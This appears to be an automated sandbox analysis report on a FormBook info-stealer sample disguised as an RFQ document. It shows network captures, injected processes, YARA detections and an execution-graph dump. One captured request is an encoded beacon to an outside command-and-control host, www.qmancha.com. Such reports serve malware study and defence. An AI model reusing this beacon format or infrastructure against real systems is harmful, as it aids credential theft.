                  Jul 4, 2024 03:13:53.623188019 CEST | 1236 | IN | Data Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                  Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                  Jul 4, 2024 03:13:53.623198032 CEST | 1236 | IN | Data Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                  Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                  Jul 4, 2024 03:13:53.623207092 CEST | 1236 | IN | Data Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                  Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                  Jul 4, 2024 03:13:53.623435974 CEST | 217 | IN | Data Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                  Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                  Session ID: 38 | Source IP: 192.168.2.4 | Source Port: 49780 | Destination IP: 202.95.21.152 | Destination Port: 80 | PID: 3760 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:53.626059055 CEST | 504 | OUT | GET /3in6/?b4=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&5DGDh=Hn3dOR HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Connection: close
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Jul 4, 2024 03:13:54.555488110 CEST | 193 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:54 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0

                  Target ID:0
                  Start time:21:09:54
                  Start date:03/07/2024
                  Path:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
                  Imagebase:0xe70000
                  File size:1'173'504 bytes
                  MD5 hash:C8FE2E7043D030CF93CDAB759D44F5E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:21:09:55
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
                  Imagebase:0x490000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  Target ID:2
                  Start time:21:09:58
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:3
                  Start time:21:10:00
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                  Imagebase:0xe20000
                  File size:478'720 bytes
                  MD5 hash:6599A09C160036131E4A933168DA245F
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:false

                  Target ID:5
                  Start time:21:10:13
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:8
                  Start time:21:10:24
                  Start date:03/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:21:12:30
                  Start date:03/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\xl9lsbb.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
                  Imagebase:0x660000
                  File size:984'064 bytes
                  MD5 hash:C2F2B08E34FC25D172F2C3FCAB1ACFEB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:true

                  Target ID:13
                  Start time:21:12:32
                  Start date:03/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\xl9lsbb.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
                  Imagebase:0x890000
                  File size:984'064 bytes
                  MD5 hash:C2F2B08E34FC25D172F2C3FCAB1ACFEB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:true

                  Target ID:14
                  Start time:21:13:08
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:15
                  Start time:21:13:10
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\runonce.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\runonce.exe"
                  Imagebase:0xba0000
                  File size:47'104 bytes
                  MD5 hash:9E16655119DDE1B24A741C4FD4AD08FC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                  Target ID:16
                  Start time:21:13:23
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:17
                  Start time:21:13:35
                  Start date:03/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:1.3%
                    Signature Coverage:2.6%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:56
                    execution_graph: [node/edge dump of the interactive execution graph, not renderable as text; nodes are function addresses in the 0xe7xxxx-0xeexxxx range with edges between callers and callees. API calls recorded on the graph nodes: GetStdHandle, OleInitialize, CreateThread, CloseHandle, RegisterWindowMessageW, DecodePointer, EncodePointer, RaiseException, RtlAllocateHeap, RtlFreeHeap, GetModuleHandleExW, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetLastError, VariantClear, CharUpperBuffW, CharLowerBuffW, CreateFileW, ReadFile, WriteFile, SetFilePointerEx, GetFileAttributesW, FindFirstFileW, FindClose, GetCurrentProcess, TerminateProcess, FreeLibrary, VirtualAlloc. Node labels also include CRT helpers such as _memmove, _fseek, _wcscmp, _wcscpy, _strcat, __NMSG_WRITE, __getptd_noexit, __lock, __cinit, __dosmaperr and std::exception::exception.]
98220->98171 98222 e79436 98221->98222 98223 e90ff6 Mailbox 59 API calls 98222->98223 98224 e79444 98223->98224 98226 e79450 98224->98226 98249 e7935c 59 API calls Mailbox 98224->98249 98227 e791b0 98226->98227 98250 e792c0 98227->98250 98229 e791bf 98230 e90ff6 Mailbox 59 API calls 98229->98230 98231 e7925b 98229->98231 98230->98231 98231->98185 98232 e78ea0 59 API calls Mailbox 98231->98232 98232->98179 98233->98185 98234->98185 98235->98185 98236->98156 98237->98185 98239 ecf683 __NMSG_WRITE 98238->98239 98240 ecf6c2 98239->98240 98241 ecf769 98239->98241 98242 ecf6b8 98239->98242 98240->98192 98240->98197 98241->98240 98247 e77a24 61 API calls 98241->98247 98242->98240 98246 e77a24 61 API calls 98242->98246 98245->98198 98246->98242 98247->98241 98248->98213 98249->98226 98251 e792c9 Mailbox 98250->98251 98252 eaf5c8 98251->98252 98257 e792d3 98251->98257 98253 e90ff6 Mailbox 59 API calls 98252->98253 98255 eaf5d4 98253->98255 98254 e792da 98254->98229 98257->98254 98258 e79df0 59 API calls Mailbox 98257->98258 98258->98257 98259->97711 98260->97755 98261->97754 98262->97717 98263->97752 98264->97752 98265->97786 98267 e77e1f 98266->98267 98268 eaf173 98266->98268 98274 e77db0 98267->98274 98269 e78189 59 API calls 98268->98269 98272 eaf17e __NMSG_WRITE _memmove 98269->98272 98271 e77e2a 98271->97777 98273->97766 98275 e77dbf __NMSG_WRITE 98274->98275 98276 e77dd0 _memmove 98275->98276 98277 e78189 59 API calls 98275->98277 98276->98271 98278 eaf130 _memmove 98277->98278 98279->97827 98280->97799 98281->97813 98283 e7f7b0 98282->98283 98284 e7f61a 98282->98284 98287 e77f41 59 API calls 98283->98287 98285 e7f626 98284->98285 98286 eb4848 98284->98286 98307 e7f3f0 98285->98307 98288 eebf80 341 API calls 98286->98288 98290 e7f6ec Mailbox 98287->98290 98293 eb4856 98288->98293 98299 ed3e73 3 API calls 98290->98299 98322 eee24b 98290->98322 98325 edcde5 98290->98325 98291 e7f65d 98291->98290 98292 e7f790 98291->98292 98291->98293 98292->97827 98293->98292 98406 
eda0b5 89 API calls 4 library calls 98293->98406 98296 e7f743 98296->98292 98405 e79df0 59 API calls Mailbox 98296->98405 98299->98296 98300->97809 98301->97815 98302->97827 98303->97825 98304->97828 98305->97832 98306->97827 98308 e7f59a 98307->98308 98310 e7f41c 98307->98310 98408 eda0b5 89 API calls 4 library calls 98308->98408 98310->98308 98319 e7f459 _memmove 98310->98319 98311 e7f533 98312 e7f543 98311->98312 98407 eea5ee 85 API calls Mailbox 98311->98407 98312->98291 98314 e90ff6 59 API calls Mailbox 98314->98319 98315 eb4823 98410 e7f803 341 API calls 98315->98410 98317 e7a000 341 API calls 98317->98319 98318 eb47d3 98318->98291 98319->98311 98319->98314 98319->98315 98319->98317 98319->98318 98320 eb47d5 98319->98320 98409 eda0b5 89 API calls 4 library calls 98320->98409 98323 eecdf1 130 API calls 98322->98323 98324 eee25b 98323->98324 98324->98296 98326 e777c7 59 API calls 98325->98326 98327 edce1a 98326->98327 98328 e777c7 59 API calls 98327->98328 98329 edce23 98328->98329 98330 edce37 98329->98330 98544 e79c9c 59 API calls 98329->98544 98332 e79997 84 API calls 98330->98332 98333 edce54 98332->98333 98334 edcf85 Mailbox 98333->98334 98335 edcf55 98333->98335 98336 edce76 98333->98336 98334->98296 98411 e74f3d 98335->98411 98337 e79997 84 API calls 98336->98337 98339 edce82 98337->98339 98341 e781a7 59 API calls 98339->98341 98344 edce8e 98341->98344 98342 edcf81 98342->98334 98343 e777c7 59 API calls 98342->98343 98346 edcfb6 98343->98346 98349 edced4 98344->98349 98350 edcea2 98344->98350 98345 e74f3d 136 API calls 98345->98342 98347 e777c7 59 API calls 98346->98347 98348 edcfbf 98347->98348 98352 e777c7 59 API calls 98348->98352 98351 e79997 84 API calls 98349->98351 98353 e781a7 59 API calls 98350->98353 98354 edcee1 98351->98354 98355 edcfc8 98352->98355 98356 edceb2 98353->98356 98357 e781a7 59 API calls 98354->98357 98358 e777c7 59 API calls 98355->98358 98359 e77e0b 59 API calls 98356->98359 98360 edceed 98357->98360 98361 edcfd1 98358->98361 
98362 edcebc 98359->98362 98545 ed4cd3 GetFileAttributesW 98360->98545 98364 e79997 84 API calls 98361->98364 98365 e79997 84 API calls 98362->98365 98368 edcfde 98364->98368 98366 edcec8 98365->98366 98369 e77c8e 59 API calls 98366->98369 98367 edcef6 98370 edcf09 98367->98370 98373 e77b52 59 API calls 98367->98373 98371 e746f9 59 API calls 98368->98371 98369->98349 98372 e79997 84 API calls 98370->98372 98379 edcf0f 98370->98379 98374 edcff9 98371->98374 98375 edcf36 98372->98375 98373->98370 98376 e77b52 59 API calls 98374->98376 98546 ed3a2b 75 API calls Mailbox 98375->98546 98378 edd008 98376->98378 98380 edd03c 98378->98380 98381 e77b52 59 API calls 98378->98381 98379->98334 98382 e781a7 59 API calls 98380->98382 98383 edd019 98381->98383 98384 edd04a 98382->98384 98383->98380 98386 e77d2c 59 API calls 98383->98386 98385 e77c8e 59 API calls 98384->98385 98387 edd058 98385->98387 98388 edd02e 98386->98388 98389 e77c8e 59 API calls 98387->98389 98390 e77d2c 59 API calls 98388->98390 98391 edd066 98389->98391 98390->98380 98392 e77c8e 59 API calls 98391->98392 98393 edd074 98392->98393 98394 e79997 84 API calls 98393->98394 98395 edd080 98394->98395 98435 ed42ad 98395->98435 98397 edd091 98398 ed3e73 3 API calls 98397->98398 98399 edd09b 98398->98399 98400 e79997 84 API calls 98399->98400 98404 edd0cc 98399->98404 98401 edd0b9 98400->98401 98489 ed93df 98401->98489 98547 e74faa 98404->98547 98405->98296 98406->98292 98407->98312 98408->98318 98409->98318 98410->98318 98553 e74d13 98411->98553 98416 eadd0f 98419 e74faa 84 API calls 98416->98419 98417 e74f68 LoadLibraryExW 98563 e74cc8 98417->98563 98421 eadd16 98419->98421 98423 e74cc8 3 API calls 98421->98423 98425 eadd1e 98423->98425 98424 e74f8f 98424->98425 98426 e74f9b 98424->98426 98589 e7506b 98425->98589 98428 e74faa 84 API calls 98426->98428 98430 e74fa0 98428->98430 98430->98342 98430->98345 98432 eadd45 98597 e75027 98432->98597 98436 ed42c9 98435->98436 98437 ed42dc 98436->98437 98438 ed42ce 
98436->98438 98440 e777c7 59 API calls 98437->98440 98439 e781a7 59 API calls 98438->98439 98488 ed42d7 Mailbox 98439->98488 98441 ed42e4 98440->98441 98442 e777c7 59 API calls 98441->98442 98443 ed42ec 98442->98443 98444 e777c7 59 API calls 98443->98444 98445 ed42f7 98444->98445 98446 e777c7 59 API calls 98445->98446 98447 ed42ff 98446->98447 98448 e777c7 59 API calls 98447->98448 98449 ed4307 98448->98449 98450 e777c7 59 API calls 98449->98450 98451 ed430f 98450->98451 98452 e777c7 59 API calls 98451->98452 98453 ed4317 98452->98453 98454 e777c7 59 API calls 98453->98454 98455 ed431f 98454->98455 98456 e746f9 59 API calls 98455->98456 98457 ed4336 98456->98457 98458 e746f9 59 API calls 98457->98458 98459 ed434f 98458->98459 98460 e77b52 59 API calls 98459->98460 98461 ed435b 98460->98461 98462 ed436e 98461->98462 98463 e77e8c 59 API calls 98461->98463 98464 e77b52 59 API calls 98462->98464 98463->98462 98465 ed4377 98464->98465 98466 ed4387 98465->98466 98467 e77e8c 59 API calls 98465->98467 98468 e781a7 59 API calls 98466->98468 98467->98466 98469 ed4393 98468->98469 98470 e77c8e 59 API calls 98469->98470 98471 ed439f 98470->98471 99024 ed445f 59 API calls 98471->99024 98473 ed43ae 99025 ed445f 59 API calls 98473->99025 98475 ed43c1 98476 e77b52 59 API calls 98475->98476 98477 ed43cb 98476->98477 98478 ed43d0 98477->98478 98479 ed43e2 98477->98479 98480 e77e0b 59 API calls 98478->98480 98481 e77b52 59 API calls 98479->98481 98488->98397 98490 ed93ec __ftell_nolock 98489->98490 98491 e90ff6 Mailbox 59 API calls 98490->98491 98492 ed9449 98491->98492 98493 e7538e 59 API calls 98492->98493 98494 ed9453 98493->98494 98495 ed91e9 GetSystemTimeAsFileTime 98494->98495 98496 ed945e 98495->98496 98497 e75045 85 API calls 98496->98497 98498 ed9471 _wcscmp 98497->98498 98499 ed9495 98498->98499 98500 ed9542 98498->98500 99056 ed99be 98499->99056 98502 ed99be 96 API calls 98500->98502 98517 ed950e _wcscat 98502->98517 98505 e7506b 74 API calls 98506 ed9567 98505->98506 
98508 e7506b 74 API calls 98506->98508 98507 ed954b 98507->98404 98510 ed9577 98508->98510 98509 ed94c3 _wcscat _wcscpy 99063 e9432e 58 API calls __wsplitpath_helper 98509->99063 98511 e7506b 74 API calls 98510->98511 98513 ed9592 98511->98513 98514 e7506b 74 API calls 98513->98514 98515 ed95a2 98514->98515 98516 e7506b 74 API calls 98515->98516 98518 ed95bd 98516->98518 98517->98505 98517->98507 98519 e7506b 74 API calls 98518->98519 98520 ed95cd 98519->98520 98521 e7506b 74 API calls 98520->98521 98522 ed95dd 98521->98522 98523 e7506b 74 API calls 98522->98523 98524 ed95ed 98523->98524 99026 ed9b6d GetTempPathW GetTempFileNameW 98524->99026 98526 ed95f9 98544->98330 98545->98367 98546->98379 98548 e74fb4 98547->98548 98549 e74fbb 98547->98549 98550 e955d6 __fcloseall 83 API calls 98548->98550 98551 e74fdb FreeLibrary 98549->98551 98552 e74fca 98549->98552 98550->98549 98551->98552 98552->98334 98602 e74d61 98553->98602 98556 e74d3a 98558 e74d53 98556->98558 98559 e74d4a FreeLibrary 98556->98559 98557 e74d61 2 API calls 98557->98556 98560 e9548b 98558->98560 98559->98558 98606 e954a0 98560->98606 98562 e74f5c 98562->98416 98562->98417 98764 e74d94 98563->98764 98566 e74d94 2 API calls 98569 e74ced 98566->98569 98567 e74cff FreeLibrary 98568 e74d08 98567->98568 98570 e74dd0 98568->98570 98569->98567 98569->98568 98571 e90ff6 Mailbox 59 API calls 98570->98571 98572 e74de5 98571->98572 98573 e7538e 59 API calls 98572->98573 98574 e74df1 _memmove 98573->98574 98575 e74e2c 98574->98575 98577 e74f21 98574->98577 98578 e74ee9 98574->98578 98576 e75027 69 API calls 98575->98576 98582 e74e35 98576->98582 98779 ed9ba5 95 API calls 98577->98779 98768 e74fe9 CreateStreamOnHGlobal 98578->98768 98581 e7506b 74 API calls 98581->98582 98582->98581 98584 e74ec9 98582->98584 98585 eadcd0 98582->98585 98774 e75045 98582->98774 98584->98424 98586 e75045 85 API calls 98585->98586 98587 eadce4 98586->98587 98588 e7506b 74 API calls 98587->98588 98588->98584 98590 e7507d 98589->98590 
98591 eaddf6 98589->98591 98803 e95812 98590->98803 98594 ed9393 99001 ed91e9 98594->99001 98596 ed93a9 98596->98432 98598 e75036 98597->98598 98599 eaddb9 98597->98599 99006 e95e90 98598->99006 98601 e7503e 98603 e74d2e 98602->98603 98604 e74d6a LoadLibraryA 98602->98604 98603->98556 98603->98557 98604->98603 98605 e74d7b GetProcAddress 98604->98605 98605->98603 98607 e954ac _fseek 98606->98607 98608 e954bf 98607->98608 98611 e954f0 98607->98611 98655 e98d68 58 API calls __getptd_noexit 98608->98655 98610 e954c4 98656 e98ff6 9 API calls _fseek 98610->98656 98625 ea0738 98611->98625 98614 e954f5 98615 e9550b 98614->98615 98616 e954fe 98614->98616 98618 e95535 98615->98618 98619 e95515 98615->98619 98657 e98d68 58 API calls __getptd_noexit 98616->98657 98640 ea0857 98618->98640 98658 e98d68 58 API calls __getptd_noexit 98619->98658 98621 e954cf _fseek @_EH4_CallFilterFunc@8 98621->98562 98626 ea0744 _fseek 98625->98626 98627 e99e4b __lock 58 API calls 98626->98627 98637 ea0752 98627->98637 98628 ea07c6 98660 ea084e 98628->98660 98629 ea07cd 98665 e98a5d 58 API calls 2 library calls 